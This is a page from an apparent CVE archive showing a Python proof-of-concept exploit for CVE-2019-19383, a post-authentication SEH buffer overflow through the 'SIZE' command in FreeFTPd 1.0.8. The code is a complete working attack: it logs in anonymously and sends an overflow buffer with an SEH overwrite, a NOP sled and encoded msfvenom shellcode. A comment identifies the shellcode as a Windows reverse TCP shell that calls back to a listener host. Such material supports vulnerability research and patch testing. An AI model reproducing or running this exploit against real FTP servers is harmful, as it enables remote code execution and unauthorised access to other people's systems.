4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-19383
README.md
Rendering markdown...
POC / cve2019_19383.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python
"""
Description: Post-Authenticated Buffer Overflow via "SIZE" Command in FreeFTPd v1.0.8
Author: Cody Winkler
Contact: @c2thewinkler (twitter)
Date: 11/26/2019
Tested On: Windows XP SP2 EN

[+] Usage: python expoit.py <IP> <PORT> 

$ python exploit.py 127.0.0.1 21
"""

import socket
from struct import pack
import sys

host = sys.argv[1]
port = int(sys.argv[2])

username = "USER anonymous\r\n"
password = "PASS test\r\n"

nSEH = "\x90\x90\xeb\x04"

# 0x7ffc0519 : pop edi # pop edi # ret  |  {PAGE_READONLY}
SEH = pack("<I", 0x7ffc0519)

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.16 LPORT=4444 -b '\x00\x0a\x0d\x20' -e x86/alpha_mixed -f c
# Note: Shellcode must be ASCII-friendly otherwise the buffer will ignore it
shellcode = ("\x89\xe7\xda\xd2\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x6b\x4c\x4d\x38\x4d\x52\x77\x70\x53\x30\x55\x50\x53\x50\x4b"
"\x39\x38\x65\x75\x61\x59\x50\x30\x64\x6c\x4b\x42\x70\x74\x70"
"\x6c\x4b\x50\x52\x44\x4c\x4e\x6b\x61\x42\x46\x74\x6c\x4b\x54"
"\x32\x66\x48\x46\x6f\x6f\x47\x42\x6a\x44\x66\x34\x71\x49\x6f"
"\x6c\x6c\x77\x4c\x31\x71\x53\x4c\x46\x62\x54\x6c\x55\x70\x7a"
"\x61\x6a\x6f\x64\x4d\x57\x71\x5a\x67\x68\x62\x79\x62\x61\x42"
"\x53\x67\x4c\x4b\x53\x62\x34\x50\x4e\x6b\x50\x4a\x75\x6c\x4e"
"\x6b\x72\x6c\x34\x51\x42\x58\x49\x73\x50\x48\x56\x61\x6b\x61"
"\x33\x61\x4e\x6b\x76\x39\x71\x30\x66\x61\x49\x43\x6e\x6b\x42"
"\x69\x37\x68\x58\x63\x55\x6a\x73\x79\x4c\x4b\x54\x74\x4c\x4b"
"\x75\x51\x48\x56\x35\x61\x49\x6f\x4e\x4c\x6f\x31\x68\x4f\x44"
"\x4d\x45\x51\x4f\x37\x45\x68\x79\x70\x72\x55\x39\x66\x74\x43"
"\x51\x6d\x39\x68\x45\x6b\x33\x4d\x61\x34\x52\x55\x59\x74\x56"
"\x38\x4e\x6b\x62\x78\x61\x34\x65\x51\x59\x43\x31\x76\x4e\x6b"
"\x74\x4c\x50\x4b\x6e\x6b\x50\x58\x45\x4c\x76\x61\x68\x53\x6c"
"\x4b\x55\x54\x4e\x6b\x45\x51\x68\x50\x6e\x69\x71\x54\x46\x44"
"\x77\x54\x61\x4b\x33\x6b\x43\x51\x50\x59\x53\x6a\x72\x71\x39"
"\x6f\x4b\x50\x73\x6f\x43\x6f\x43\x6a\x6c\x4b\x56\x72\x38\x6b"
"\x4c\x4d\x73\x6d\x42\x48\x67\x43\x34\x72\x75\x50\x47\x70\x33"
"\x58\x71\x67\x31\x63\x30\x32\x71\x4f\x30\x54\x30\x68\x50\x4c"
"\x52\x57\x61\x36\x37\x77\x39\x6f\x7a\x75\x78\x38\x7a\x30\x63"
"\x31\x45\x50\x37\x70\x65\x79\x6f\x34\x72\x74\x50\x50\x72\x48"
"\x54\x69\x4d\x50\x62\x4b\x63\x30\x6b\x4f\x39\x45\x36\x30\x32"
"\x70\x50\x50\x66\x30\x33\x70\x72\x70\x63\x70\x30\x50\x65\x38"
"\x79\x7a\x76\x6f\x49\x4f\x49\x70\x4b\x4f\x59\x45\x4f\x67\x42"
"\x4a\x75\x55\x35\x38\x66\x6a\x74\x4a\x76\x6a\x52\x30\x31\x78"
"\x74\x42\x57\x70\x46\x71\x73\x6c\x4e\x69\x78\x66\x33\x5a\x66"
"\x70\x36\x36\x33\x67\x65\x38\x4e\x79\x6c\x65\x42\x54\x45\x31"
"\x6b\x4f\x4b\x65\x6f\x75\x49\x50\x31\x64\x54\x4c\x4b\x4f\x30"
"\x4e\x55\x58\x74\x35\x7a\x4c\x61\x78\x78\x70\x4e\x55\x6c\x62"
"\x61\x46\x49\x6f\x4b\x65\x50\x68\x75\x33\x52\x4d\x50\x64\x43"
"\x30\x4d\x59\x4d\x33\x30\x57\x72\x77\x30\x57\x76\x51\x79\x66"
"\x52\x4a\x75\x42\x66\x39\x73\x66\x49\x72\x39\x6d\x75\x36\x38"
"\x47\x51\x54\x45\x74\x35\x6c\x43\x31\x75\x51\x4e\x6d\x37\x34"
"\x61\x34\x52\x30\x6a\x66\x73\x30\x51\x54\x66\x34\x72\x70\x51"
"\x46\x66\x36\x43\x66\x73\x76\x71\x46\x52\x6e\x51\x46\x42\x76"
"\x62\x73\x51\x46\x61\x78\x31\x69\x48\x4c\x37\x4f\x4e\x66\x79"
"\x6f\x49\x45\x4f\x79\x59\x70\x70\x4e\x31\x46\x67\x36\x59\x6f"
"\x36\x50\x52\x48\x37\x78\x6b\x37\x47\x6d\x63\x50\x59\x6f\x6b"
"\x65\x4f\x4b\x58\x70\x6f\x45\x39\x32\x53\x66\x32\x48\x6f\x56"
"\x6a\x35\x6f\x4d\x4d\x4d\x6b\x4f\x49\x45\x75\x6c\x43\x36\x61"
"\x6c\x74\x4a\x4d\x50\x39\x6b\x6b\x50\x74\x35\x55\x55\x6d\x6b"
"\x53\x77\x32\x33\x33\x42\x62\x4f\x70\x6a\x37\x70\x71\x43\x49"
"\x6f\x59\x45\x41\x41")

nopsled = "\x90"*8

command = "SIZE "

buffer = "A"*982
buffer += nSEH
buffer += SEH
buffer += nopsled
buffer += shellcode
buffer += "\x43"*(1816-982-8-len(nopsled)-len(shellcode))
buffer += "\x0a"


try:

    print "[+] Connecting to target"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print s.recv(1024)
    s.send(username)
    print s.recv(1024)
    s.send(password)
    s.recv(1024)
    s.send(command + buffer)
    print "[+] Sent " + command + "payload with length: %d" % len(buffer)
    s.close()

except:
    print "[-] Failed to connect to destination FreeFTPD Service"